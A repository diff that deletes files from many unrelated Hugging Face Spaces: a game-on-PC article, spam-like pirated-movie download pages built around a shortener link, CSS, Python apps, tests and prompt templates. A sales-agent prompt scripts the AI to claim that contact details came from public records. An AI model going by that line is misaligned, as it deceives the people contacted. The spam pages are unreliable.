      • Make use of your superpowers and unlock new ones: You can use your superpowers to gain an edge in combat and movement. You can also unlock new powers as you progress in the game, such as super strength, speed, vision, healing, and more.
      • -
      • Various weapons with different powers: You can equip yourself with different weapons to suit your style and strategy. You can use guns, grenades, rockets, lasers, swords, hammers, and more. Each weapon has its own advantages and disadvantages.
      • -
      • Interesting vehicles to roam the city: You can drive or ride various vehicles to travel faster and easier around the city. You can use cars, bikes, helicopters, tanks, jets, and more. Each vehicle has its own features and abilities.
      • -
      • Many unique gadgets to work with: You can use different gadgets to enhance your gameplay and have more fun. You can use jetpacks, drones, magnets, parachutes, grappling hooks, and more. Each gadget has its own function and effect.
      • -
      • Freely discover the city in your own ways: You can roam around the city and find many secrets and surprises. You can interact with different objects and people. You can also customize your character's appearance and skills.
      • -
      • -

        As you can see, Rope Hero is a game that offers a lot of fun and excitement for anyone who loves action and adventure. If you want to experience the game on your PC Windows 10, you can follow the methods we have explained above. We hope you found this article helpful and informative. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

        -

        FAQs

        -

        Here are some frequently asked questions about Rope Hero and how to play it on PC Windows 10:

        -
          -
        1. Is Rope Hero free to play?
        2. -

          Yes, Rope Hero is free to play on both Android and PC. However, the game may contain some in-app purchases and ads that can enhance your gameplay or support the developers.

          -
        3. Is Rope Hero safe to download and install?
        4. -

          Yes, Rope Hero is safe to download and install, as long as you use a trusted source and an emulator. We recommend using the Google Play Store or the links we provided above to download the game, and BlueStacks or another emulator to install it on your PC.

          -
        5. Can I play Rope Hero offline?
        6. -

          Yes, you can play Rope Hero offline, as the game does not require an internet connection to run. However, some features and functions may not be available or updated when you play offline.

          -
        7. How can I update Rope Hero on PC?
        8. -

          You can update Rope Hero on PC by following the same steps as you would on your Android device. You can either use the Google Play Store or the APK/XAPK file to update the game. Make sure you have enough storage space and a stable internet connection before updating.

          -
        9. How can I contact the developers of Rope Hero?
        10. -

          You can contact the developers of Rope Hero by visiting their official website here, or by sending them an email at ropehero@naxeex.com. You can also follow them on their social media accounts, such as Facebook, Twitter, and YouTube.

          -

        401be4b1e0
        -
        -
        \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Download Dedh Ishqiya Full Movie Kickass Torrent A Tale of Love Betrayal and Revenge.md b/spaces/contluForse/HuggingGPT/assets/Download Dedh Ishqiya Full Movie Kickass Torrent A Tale of Love Betrayal and Revenge.md deleted file mode 100644 index f57d8c3a22e54e8dbac905c5b48d65a1e7ad50d4..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Download Dedh Ishqiya Full Movie Kickass Torrent A Tale of Love Betrayal and Revenge.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Download Dedh Ishqiya Full Movie Kickass Torrent


        DOWNLOAD === https://ssurll.com/2uzyrl



        - - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/contluForse/HuggingGPT/assets/Drag Me to Hell Full Movie in Hindi MP4 12 Dont Miss this Shocking and Suspenseful Film.md b/spaces/contluForse/HuggingGPT/assets/Drag Me to Hell Full Movie in Hindi MP4 12 Dont Miss this Shocking and Suspenseful Film.md deleted file mode 100644 index af8ecc627d12b8f56fca39b31ea8ecd609032e21..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Drag Me to Hell Full Movie in Hindi MP4 12 Dont Miss this Shocking and Suspenseful Film.md +++ /dev/null @@ -1,6 +0,0 @@ -

        dragmetohellfullmovieinhindimp412


        Download Zip > https://ssurll.com/2uzyvr



        -
        - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/coyotte508/static-light-dark/style.css b/spaces/coyotte508/static-light-dark/style.css deleted file mode 100644 index b8f5e546ec5f9f08161b97b675d7efec65ce6584..0000000000000000000000000000000000000000 --- a/spaces/coyotte508/static-light-dark/style.css +++ /dev/null @@ -1,41 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} - -@media (prefers-color-scheme: dark) { - body { - background: black; - color: gray; - } -} - -@media (prefers-color-scheme: light) { - body { - background: yellow; - } -} diff --git a/spaces/crashedice/signify/SOURCE/yolo_files/__init__.py b/spaces/crashedice/signify/SOURCE/yolo_files/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/cvlab/zero123-live/ldm/lr_scheduler.py b/spaces/cvlab/zero123-live/ldm/lr_scheduler.py deleted file mode 100644 index be39da9ca6dacc22bf3df9c7389bbb403a4a3ade..0000000000000000000000000000000000000000 --- a/spaces/cvlab/zero123-live/ldm/lr_scheduler.py +++ /dev/null @@ -1,98 +0,0 @@ -import numpy as np - - -class LambdaWarmUpCosineScheduler: - """ - note: use with a base_lr of 1.0 - """ - def __init__(self, warm_up_steps, lr_min, lr_max, lr_start, max_decay_steps, verbosity_interval=0): - self.lr_warm_up_steps = warm_up_steps - self.lr_start = lr_start - self.lr_min = lr_min - self.lr_max = lr_max - self.lr_max_decay_steps = max_decay_steps - self.last_lr = 0. - self.verbosity_interval = verbosity_interval - - def schedule(self, n, **kwargs): - if self.verbosity_interval > 0: - if n % self.verbosity_interval == 0: print(f"current step: {n}, recent lr-multiplier: {self.last_lr}") - if n < self.lr_warm_up_steps: - lr = (self.lr_max - self.lr_start) / self.lr_warm_up_steps * n + self.lr_start - self.last_lr = lr - return lr - else: - t = (n - self.lr_warm_up_steps) / (self.lr_max_decay_steps - self.lr_warm_up_steps) - t = min(t, 1.0) - lr = self.lr_min + 0.5 * (self.lr_max - self.lr_min) * ( - 1 + np.cos(t * np.pi)) - self.last_lr = lr - return lr - - def __call__(self, n, **kwargs): - return self.schedule(n,**kwargs) - - -class LambdaWarmUpCosineScheduler2: - """ - supports repeated iterations, configurable via lists - note: use with a base_lr of 1.0. - """ - def __init__(self, warm_up_steps, f_min, f_max, f_start, cycle_lengths, verbosity_interval=0): - assert len(warm_up_steps) == len(f_min) == len(f_max) == len(f_start) == len(cycle_lengths) - self.lr_warm_up_steps = warm_up_steps - self.f_start = f_start - self.f_min = f_min - self.f_max = f_max - self.cycle_lengths = cycle_lengths - self.cum_cycles = np.cumsum([0] + list(self.cycle_lengths)) - self.last_f = 0. - self.verbosity_interval = verbosity_interval - - def find_in_interval(self, n): - interval = 0 - for cl in self.cum_cycles[1:]: - if n <= cl: - return interval - interval += 1 - - def schedule(self, n, **kwargs): - cycle = self.find_in_interval(n) - n = n - self.cum_cycles[cycle] - if self.verbosity_interval > 0: - if n % self.verbosity_interval == 0: print(f"current step: {n}, recent lr-multiplier: {self.last_f}, " - f"current cycle {cycle}") - if n < self.lr_warm_up_steps[cycle]: - f = (self.f_max[cycle] - self.f_start[cycle]) / self.lr_warm_up_steps[cycle] * n + self.f_start[cycle] - self.last_f = f - return f - else: - t = (n - self.lr_warm_up_steps[cycle]) / (self.cycle_lengths[cycle] - self.lr_warm_up_steps[cycle]) - t = min(t, 1.0) - f = self.f_min[cycle] + 0.5 * (self.f_max[cycle] - self.f_min[cycle]) * ( - 1 + np.cos(t * np.pi)) - self.last_f = f - return f - - def __call__(self, n, **kwargs): - return self.schedule(n, **kwargs) - - -class LambdaLinearScheduler(LambdaWarmUpCosineScheduler2): - - def schedule(self, n, **kwargs): - cycle = self.find_in_interval(n) - n = n - self.cum_cycles[cycle] - if self.verbosity_interval > 0: - if n % self.verbosity_interval == 0: print(f"current step: {n}, recent lr-multiplier: {self.last_f}, " - f"current cycle {cycle}") - - if n < self.lr_warm_up_steps[cycle]: - f = (self.f_max[cycle] - self.f_start[cycle]) / self.lr_warm_up_steps[cycle] * n + self.f_start[cycle] - self.last_f = f - return f - else: - f = self.f_min[cycle] + (self.f_max[cycle] - self.f_min[cycle]) * (self.cycle_lengths[cycle] - n) / (self.cycle_lengths[cycle]) - self.last_f = f - return f - diff --git a/spaces/dakaiye/dky_xuexi/core_functional.py b/spaces/dakaiye/dky_xuexi/core_functional.py deleted file mode 100644 index e126b5733a26b2c06668755fc44763efe3d30bac..0000000000000000000000000000000000000000 --- a/spaces/dakaiye/dky_xuexi/core_functional.py +++ /dev/null @@ -1,78 +0,0 @@ -# 'primary' 颜色对应 theme.py 中的 primary_hue -# 'secondary' 颜色对应 theme.py 中的 neutral_hue -# 'stop' 颜色对应 theme.py 中的 color_er -# 默认按钮颜色是 secondary -from toolbox import clear_line_break - - -def get_core_functions(): - return { - "英语学术润色": { - # 前言 - "Prefix": r"Below is a paragraph from an academic paper. Polish the writing to meet the academic style, " + - r"improve the spelling, grammar, clarity, concision and overall readability. When necessary, rewrite the whole sentence. " + - r"Furthermore, list all modification and explain the reasons to do so in markdown table." + "\n\n", - # 后语 - "Suffix": r"", - "Color": r"secondary", # 按钮颜色 - }, - "中文学术润色": { - "Prefix": r"作为一名中文学术论文写作改进助理,你的任务是改进所提供文本的拼写、语法、清晰、简洁和整体可读性," + - r"同时分解长句,减少重复,并提供改进建议。请只提供文本的更正版本,避免包括解释。请编辑以下文本" + "\n\n", - "Suffix": r"", - }, - "查找语法错误": { - "Prefix": r"Can you help me ensure that the grammar and the spelling is correct? " + - r"Do not try to polish the text, if no mistake is found, tell me that this paragraph is good." + - r"If you find grammar or spelling mistakes, please list mistakes you find in a two-column markdown table, " + - r"put the original text the first column, " + - r"put the corrected text in the second column and highlight the key words you fixed.""\n" - r"Example:""\n" - r"Paragraph: How is you? Do you knows what is it?""\n" - r"| Original sentence | Corrected sentence |""\n" - r"| :--- | :--- |""\n" - r"| How **is** you? | How **are** you? |""\n" - r"| Do you **knows** what **is** **it**? | Do you **know** what **it** **is** ? |""\n" - r"Below is a paragraph from an academic paper. " - r"You need to report all grammar and spelling mistakes as the example before." - + "\n\n", - "Suffix": r"", - "PreProcess": clear_line_break, # 预处理:清除换行符 - }, - "中译英": { - "Prefix": r"Please translate following sentence to English:" + "\n\n", - "Suffix": r"", - }, - "学术中英互译": { - "Prefix": r"I want you to act as a scientific English-Chinese translator, " + - r"I will provide you with some paragraphs in one language " + - r"and your task is to accurately and academically translate the paragraphs only into the other language. " + - r"Do not repeat the original provided paragraphs after translation. " + - r"You should use artificial intelligence tools, " + - r"such as natural language processing, and rhetorical knowledge " + - r"and experience about effective writing techniques to reply. " + - r"I'll give you my paragraphs as follows, tell me what language it is written in, and then translate:" + "\n\n", - "Suffix": "", - "Color": "secondary", - }, - "英译中": { - "Prefix": r"翻译成地道的中文:" + "\n\n", - "Suffix": r"", - }, - "找图片": { - "Prefix": r"我需要你找一张网络图片。使用Unsplash API(https://source.unsplash.com/960x640/?<英语关键词>)获取图片URL," + - r"然后请使用Markdown格式封装,并且不要有反斜线,不要用代码块。现在,请按以下描述给我发送图片:" + "\n\n", - "Suffix": r"", - }, - "解释代码": { - "Prefix": r"请解释以下代码:" + "\n```\n", - "Suffix": "\n```\n", - }, - "参考文献转Bib": { - "Prefix": r"Here are some bibliography items, please transform them into bibtex style." + - r"Note that, reference styles maybe more than one kind, you should transform each item correctly." + - r"Items need to be transformed:", - "Suffix": r"", - "Visible": False, - } - } diff --git a/spaces/dashues/frieda/app.py b/spaces/dashues/frieda/app.py deleted file mode 100644 index 179177015b8fb47a3a0e85922c8fa9d9e5615a83..0000000000000000000000000000000000000000 --- a/spaces/dashues/frieda/app.py +++ /dev/null @@ -1,22 +0,0 @@ -import gradio as gr -from fastai.vision.all import * -import skimage - - -def label_func(s: str): return " ".join(s.split("_")[:-1]) - -learn = load_learner('frieda_and_pet_classifier.pkl') - -labels = learn.dls.vocab -def predict(img): - img = PILImage.create(img) - pred,pred_idx,probs = learn.predict(img) - return {labels[i]: float(probs[i]) for i in range(len(labels))} - -title = "Frieda and other pet breeds classifier" -description = "A classifier that can predict pet breeds including the most unique breed *Frieda* with the rarity of one. It is trained on the Oxford Pets dataset, augmented by images of Frieda the dog, with fastai. Credits to Jeremhy Howard and his awesome fastai course as well as Gradio and HuggingFace." -examples = ['frieda.jpg', 'cat.jpg'] -interpretation='default' -enable_queue=True - -gr.Interface(fn=predict,inputs=gr.inputs.Image(shape=(512, 512)),outputs=gr.outputs.Label(num_top_classes=3),title=title,description=description,examples=examples,interpretation=interpretation,enable_queue=enable_queue).launch() diff --git a/spaces/davidscripka/openWakeWord/app.py b/spaces/davidscripka/openWakeWord/app.py deleted file mode 100644 index e7f57cf8f65269ff8f0d39f4d98bb37f9d48b5df..0000000000000000000000000000000000000000 --- a/spaces/davidscripka/openWakeWord/app.py +++ /dev/null @@ -1,97 +0,0 @@ -import gradio as gr -import json -import pandas as pd -import collections -import scipy.signal -import numpy as np -from functools import partial -from openwakeword.model import Model - -# Load openWakeWord models -model = Model(inference_framework="onnx") - -# Define function to process audio -def process_audio(audio, state=collections.defaultdict(partial(collections.deque, maxlen=60))): - # Resample audio to 16khz if needed - if audio[0] != 16000: - data = scipy.signal.resample(audio[1], int(float(audio[1].shape[0])/audio[0]*16000)) - - # Get predictions - for i in range(0, data.shape[0], 1280): - if len(data.shape) == 2 or data.shape[-1] == 2: - chunk = data[i:i+1280][:, 0] # just get one channel of audio - else: - chunk = data[i:i+1280] - - if chunk.shape[0] == 1280: - prediction = model.predict(chunk) - for key in prediction: - #Fill deque with zeros if it's empty - if len(state[key]) == 0: - state[key].extend(np.zeros(60)) - - # Add prediction - state[key].append(prediction[key]) - - # Make line plot - dfs = [] - for key in state.keys(): - df = pd.DataFrame({"x": np.arange(len(state[key])), "y": state[key], "Model": key}) - dfs.append(df) - - df = pd.concat(dfs) - plot = gr.LinePlot().update(value = df, x='x', y='y', color="Model", y_lim = (0,1), tooltip="Model", - width=600, height=300, x_title="Time (frames)", y_title="Model Score", color_legend_position="bottom") - - # Manually adjust how the legend is displayed - tmp = json.loads(plot["value"]["plot"]) - tmp["layer"][0]['encoding']['color']['legend']["direction"] = "vertical" - tmp["layer"][0]['encoding']['color']['legend']["columns"] = 4 - tmp["layer"][0]['encoding']['color']['legend']["labelFontSize"] = 12 - tmp["layer"][0]['encoding']['color']['legend']["titleFontSize"] = 14 - - plot["value"]['plot'] = json.dumps(tmp) - - return plot, state - -# Create Gradio interface and launch - -desc = """ -This is a demo of the pre-trained models included in the latest release -of the [openWakeWord](https://github.com/dscripka/openWakeWord) library. - -Click on the "record from microphone" button below to start capturing. -The real-time scores from each model will be shown in the line plot. Hover over -each line to see the name of the corresponding model. - -Different models will respond to different wake words/phrases (see [the model docs](https://github.com/dscripka/openWakeWord/tree/main/docs/models) for more details). -If everything is working properly, -you should see a spike in the score for a given model after speaking a related word/phrase. Below are some suggested phrases to try! - -| Model Name | Word/Phrase | -| --- | --- | -| alexa | "alexa" | -| hey_mycroft | "hey mycroft"| -| hey_jarvis | "hey jarvis"| -| hey_rhasspy | "hey rhasspy"| -| weather | "what's the weather", "tell me today's weather" | -| x_minute_timer | "set a timer for 1 minute", "create 1 hour alarm" | - -""" - -gr_int = gr.Interface( - title = "openWakeWord Live Demo", - description = desc, - css = ".flex {flex-direction: column} .gr-panel {width: 100%}", - fn=process_audio, - inputs=[ - gr.Audio(source="microphone", type="numpy", streaming=True, show_label=False), - "state" - ], - outputs=[ - gr.LinePlot(show_label=False), - "state" - ], - live=True) - -gr_int.launch() \ No newline at end of file diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/anyio/abc/__init__.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/anyio/abc/__init__.py deleted file mode 100644 index 72c34e544e1634e4f42c005506bac9b61ab095f5..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/anyio/abc/__init__.py +++ /dev/null @@ -1,90 +0,0 @@ -from __future__ import annotations - -__all__ = ( - "AsyncResource", - "IPAddressType", - "IPSockAddrType", - "SocketAttribute", - "SocketStream", - "SocketListener", - "UDPSocket", - "UNIXSocketStream", - "UDPPacketType", - "ConnectedUDPSocket", - "UnreliableObjectReceiveStream", - "UnreliableObjectSendStream", - "UnreliableObjectStream", - "ObjectReceiveStream", - "ObjectSendStream", - "ObjectStream", - "ByteReceiveStream", - "ByteSendStream", - "ByteStream", - "AnyUnreliableByteReceiveStream", - "AnyUnreliableByteSendStream", - "AnyUnreliableByteStream", - "AnyByteReceiveStream", - "AnyByteSendStream", - "AnyByteStream", - "Listener", - "Process", - "Event", - "Condition", - "Lock", - "Semaphore", - "CapacityLimiter", - "CancelScope", - "TaskGroup", - "TaskStatus", - "TestRunner", - "BlockingPortal", -) - -from typing import Any - -from ._resources import AsyncResource -from ._sockets import ( - ConnectedUDPSocket, - IPAddressType, - IPSockAddrType, - SocketAttribute, - SocketListener, - SocketStream, - UDPPacketType, - UDPSocket, - UNIXSocketStream, -) -from ._streams import ( - AnyByteReceiveStream, - AnyByteSendStream, - AnyByteStream, - AnyUnreliableByteReceiveStream, - AnyUnreliableByteSendStream, - AnyUnreliableByteStream, - ByteReceiveStream, - ByteSendStream, - ByteStream, - Listener, - ObjectReceiveStream, - ObjectSendStream, - ObjectStream, - UnreliableObjectReceiveStream, - UnreliableObjectSendStream, - UnreliableObjectStream, -) -from ._subprocesses import Process -from ._tasks import TaskGroup, TaskStatus -from ._testing import TestRunner - -# Re-exported here, for backwards compatibility -# isort: off -from .._core._synchronization import CapacityLimiter, Condition, Event, Lock, Semaphore -from .._core._tasks import CancelScope -from ..from_thread import BlockingPortal - -# Re-export imports so they look like they live directly in this package -key: str -value: Any -for key, value in list(locals().items()): - if getattr(value, "__module__", "").startswith("anyio.abc."): - value.__module__ = __name__ diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/components/carousel.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/components/carousel.py deleted file mode 100644 index 00a064420f1361e7be8e69e3542dcfa7a04a2bc9..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/components/carousel.py +++ /dev/null @@ -1,22 +0,0 @@ -"""gr.Carousel() component.""" - -from gradio_client.serializing import SimpleSerializable - -from gradio.components.base import IOComponent -from gradio.events import Changeable - - -class Carousel(IOComponent, Changeable, SimpleSerializable): - """ - Deprecated Component - """ - - def __init__( - self, - *args, - **kwargs, - ): - raise DeprecationWarning( - "The Carousel component is deprecated. Please consider using the Gallery " - "component, which can be used to display images (and optional captions).", - ) diff --git a/spaces/declare-lab/tango/diffusers/src/diffusers/utils/accelerate_utils.py b/spaces/declare-lab/tango/diffusers/src/diffusers/utils/accelerate_utils.py deleted file mode 100644 index 10a83e1dd209cca198f4038d0d7e7228f9671859..0000000000000000000000000000000000000000 --- a/spaces/declare-lab/tango/diffusers/src/diffusers/utils/accelerate_utils.py +++ /dev/null @@ -1,48 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" -Accelerate utilities: Utilities related to accelerate -""" - -from packaging import version - -from .import_utils import is_accelerate_available - - -if is_accelerate_available(): - import accelerate - - -def apply_forward_hook(method): - """ - Decorator that applies a registered CpuOffload hook to an arbitrary function rather than `forward`. This is useful - for cases where a PyTorch module provides functions other than `forward` that should trigger a move to the - appropriate acceleration device. This is the case for `encode` and `decode` in [`AutoencoderKL`]. - - This decorator looks inside the internal `_hf_hook` property to find a registered offload hook. - - :param method: The method to decorate. This method should be a method of a PyTorch module. - """ - if not is_accelerate_available(): - return method - accelerate_version = version.parse(accelerate.__version__).base_version - if version.parse(accelerate_version) < version.parse("0.17.0"): - return method - - def wrapper(self, *args, **kwargs): - if hasattr(self, "_hf_hook") and hasattr(self._hf_hook, "pre_forward"): - self._hf_hook.pre_forward(self) - return method(self, *args, **kwargs) - - return wrapper diff --git a/spaces/declare-lab/tango/diffusers/tests/pipelines/versatile_diffusion/test_versatile_diffusion_text_to_image.py b/spaces/declare-lab/tango/diffusers/tests/pipelines/versatile_diffusion/test_versatile_diffusion_text_to_image.py deleted file mode 100644 index 194f660f7055308b41c47c14a35c41f3b2b1014b..0000000000000000000000000000000000000000 --- a/spaces/declare-lab/tango/diffusers/tests/pipelines/versatile_diffusion/test_versatile_diffusion_text_to_image.py +++ /dev/null @@ -1,87 +0,0 @@ -# coding=utf-8 -# Copyright 2023 HuggingFace Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import gc -import tempfile -import unittest - -import numpy as np -import torch - -from diffusers import VersatileDiffusionTextToImagePipeline -from diffusers.utils.testing_utils import nightly, require_torch_gpu, torch_device - - -torch.backends.cuda.matmul.allow_tf32 = False - - -class VersatileDiffusionTextToImagePipelineFastTests(unittest.TestCase): - pass - - -@nightly -@require_torch_gpu -class VersatileDiffusionTextToImagePipelineIntegrationTests(unittest.TestCase): - def tearDown(self): - # clean up the VRAM after each test - super().tearDown() - gc.collect() - torch.cuda.empty_cache() - - def test_remove_unused_weights_save_load(self): - pipe = VersatileDiffusionTextToImagePipeline.from_pretrained("shi-labs/versatile-diffusion") - # remove text_unet - pipe.remove_unused_weights() - pipe.to(torch_device) - pipe.set_progress_bar_config(disable=None) - - prompt = "A painting of a squirrel eating a burger " - generator = torch.manual_seed(0) - image = pipe( - prompt=prompt, generator=generator, guidance_scale=7.5, num_inference_steps=2, output_type="numpy" - ).images - - with tempfile.TemporaryDirectory() as tmpdirname: - pipe.save_pretrained(tmpdirname) - pipe = VersatileDiffusionTextToImagePipeline.from_pretrained(tmpdirname) - pipe.to(torch_device) - pipe.set_progress_bar_config(disable=None) - - generator = generator.manual_seed(0) - new_image = pipe( - prompt=prompt, generator=generator, guidance_scale=7.5, num_inference_steps=2, output_type="numpy" - ).images - - assert np.abs(image - new_image).sum() < 1e-5, "Models don't have the same forward pass" - - def test_inference_text2img(self): - pipe = VersatileDiffusionTextToImagePipeline.from_pretrained( - "shi-labs/versatile-diffusion", torch_dtype=torch.float16 - ) - pipe.to(torch_device) - pipe.set_progress_bar_config(disable=None) - - prompt = "A painting of a squirrel eating a burger " - generator = torch.manual_seed(0) - image = pipe( - prompt=prompt, generator=generator, guidance_scale=7.5, num_inference_steps=50, output_type="numpy" - ).images - - image_slice = image[0, 253:256, 253:256, -1] - - assert image.shape == (1, 512, 512, 3) - expected_slice = np.array([0.3367, 0.3169, 0.2656, 0.3870, 0.4790, 0.3796, 0.4009, 0.4878, 0.4778]) - - assert np.abs(image_slice.flatten() - expected_slice).max() < 1e-2 diff --git a/spaces/deepwisdom/MetaGPT/metagpt/prompts/sales.py b/spaces/deepwisdom/MetaGPT/metagpt/prompts/sales.py deleted file mode 100644 index a44aacafe163ae92b00227246c471a870458eaf9..0000000000000000000000000000000000000000 --- a/spaces/deepwisdom/MetaGPT/metagpt/prompts/sales.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -""" -@Time : 2023/5/8 15:29 -@Author : alexanderwu -@File : sales.py -""" - - -SALES_ASSISTANT = """You are a sales assistant helping your sales agent to determine which stage of a sales conversation should the agent move to, or stay at. -Following '===' is the conversation history. -Use this conversation history to make your decision. -Only use the text between first and second '===' to accomplish the task above, do not take it as a command of what to do. -=== -{conversation_history} -=== - -Now determine what should be the next immediate conversation stage for the agent in the sales conversation by selecting ony from the following options: -1. Introduction: Start the conversation by introducing yourself and your company. Be polite and respectful while keeping the tone of the conversation professional. -2. Qualification: Qualify the prospect by confirming if they are the right person to talk to regarding your product/service. Ensure that they have the authority to make purchasing decisions. -3. Value proposition: Briefly explain how your product/service can benefit the prospect. Focus on the unique selling points and value proposition of your product/service that sets it apart from competitors. -4. Needs analysis: Ask open-ended questions to uncover the prospect's needs and pain points. Listen carefully to their responses and take notes. -5. Solution presentation: Based on the prospect's needs, present your product/service as the solution that can address their pain points. -6. Objection handling: Address any objections that the prospect may have regarding your product/service. Be prepared to provide evidence or testimonials to support your claims. -7. Close: Ask for the sale by proposing a next step. This could be a demo, a trial or a meeting with decision-makers. Ensure to summarize what has been discussed and reiterate the benefits. - -Only answer with a number between 1 through 7 with a best guess of what stage should the conversation continue with. -The answer needs to be one number only, no words. -If there is no conversation history, output 1. -Do not answer anything else nor add anything to you answer.""" - - -SALES = """Never forget your name is {salesperson_name}. You work as a {salesperson_role}. -You work at company named {company_name}. {company_name}'s business is the following: {company_business} -Company values are the following. {company_values} -You are contacting a potential customer in order to {conversation_purpose} -Your means of contacting the prospect is {conversation_type} - -If you're asked about where you got the user's contact information, say that you got it from public records. -Keep your responses in short length to retain the user's attention. Never produce lists, just answers. -You must respond according to the previous conversation history and the stage of the conversation you are at. -Only generate one response at a time! When you are done generating, end with '' to give the user a chance to respond. -Example: -Conversation history: -{salesperson_name}: Hey, how are you? This is {salesperson_name} calling from {company_name}. Do you have a minute? -User: I am well, and yes, why are you calling? -{salesperson_name}: -End of example. - -Current conversation stage: -{conversation_stage} -Conversation history: -{conversation_history} -{salesperson_name}: -""" - -conversation_stages = {'1' : "Introduction: Start the conversation by introducing yourself and your company. Be polite and respectful while keeping the tone of the conversation professional. Your greeting should be welcoming. Always clarify in your greeting the reason why you are contacting the prospect.", -'2': "Qualification: Qualify the prospect by confirming if they are the right person to talk to regarding your product/service. Ensure that they have the authority to make purchasing decisions.", -'3': "Value proposition: Briefly explain how your product/service can benefit the prospect. Focus on the unique selling points and value proposition of your product/service that sets it apart from competitors.", -'4': "Needs analysis: Ask open-ended questions to uncover the prospect's needs and pain points. Listen carefully to their responses and take notes.", -'5': "Solution presentation: Based on the prospect's needs, present your product/service as the solution that can address their pain points.", -'6': "Objection handling: Address any objections that the prospect may have regarding your product/service. Be prepared to provide evidence or testimonials to support your claims.", -'7': "Close: Ask for the sale by proposing a next step. This could be a demo, a trial or a meeting with decision-makers. Ensure to summarize what has been discussed and reiterate the benefits."} diff --git a/spaces/deprem-ml/deprem_keras-satellite_semantic_mapping-challange/app.py b/spaces/deprem-ml/deprem_keras-satellite_semantic_mapping-challange/app.py deleted file mode 100644 index 13ddbca0470ec0f7362cebf49e6bffb67fc687e7..0000000000000000000000000000000000000000 --- a/spaces/deprem-ml/deprem_keras-satellite_semantic_mapping-challange/app.py +++ /dev/null @@ -1,43 +0,0 @@ -from skimage.util import montage as montage2d -from utils import load_model, preprocess_image, attempt_download_from_hub -import matplotlib.pyplot as plt - -import gradio as gr - -model_path = 'deprem-ml/deprem-keras-satellite-semantic-mapping' - -def keras_inference(img_data, model_path): - model_path = attempt_download_from_hub(model_path) - seg_model = load_model(model_path) - out_img = preprocess_image(img_data) - pred_y = seg_model.predict(out_img) - - plt.imshow(montage2d(pred_y[:, :, :, 0]), cmap = 'bone_r') - plt.savefig('output.png') - return 'output.png' - -inputs = [ - gr.Image(type='filepath', label='Image'), - gr.Dropdown([model_path], value=model_path, label='Model Path') -] - -outputs = gr.Image(label='Segmentation') - -examples = [ - ['data/testv1.jpg', model_path], - ['data/testv2.jpg', model_path], - ['data/testv3.jpg', model_path], -] - -title = 'Segmenting Buildings in Satellite Images with Keras' - -demo_app = gr.Interface( - keras_inference, - inputs, - outputs, - title=title, - examples=examples, - cache_examples=True, -) - -demo_app.launch(debug=True, enable_queue=True) diff --git a/spaces/diacanFperku/AutoGPT/Band Baaja Baaraat Movie Free _HOT_ Download 1080p Movies.md b/spaces/diacanFperku/AutoGPT/Band Baaja Baaraat Movie Free _HOT_ Download 1080p Movies.md deleted file mode 100644 index f81c39cb78994603f5df7f5338996585e4469c43..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Band Baaja Baaraat Movie Free _HOT_ Download 1080p Movies.md +++ /dev/null @@ -1,12 +0,0 @@ -

        Band Baaja Baaraat movie free download 1080p movies


        Download 🌟 https://gohhs.com/2uFUuq



        -
        -band baaja baaraat movie 1080p movies hd youtube ru songs from youtube how to make music at the beginning of mp3 songs from youtube how to make music at the beginning of mp3 songs from youtube how to make a video at the beginning! -And them with pleasure. -How can I make the splash screen appear at the beginning? -To have a splash screen appear at the beginning? -Every video on YouTube has an intro. -This is not the first time I've watched this video. -But how to make music at the beginning of mp3 songs from YouTube how to make the video without intro? 8a78ff9644
        -
        -
        -

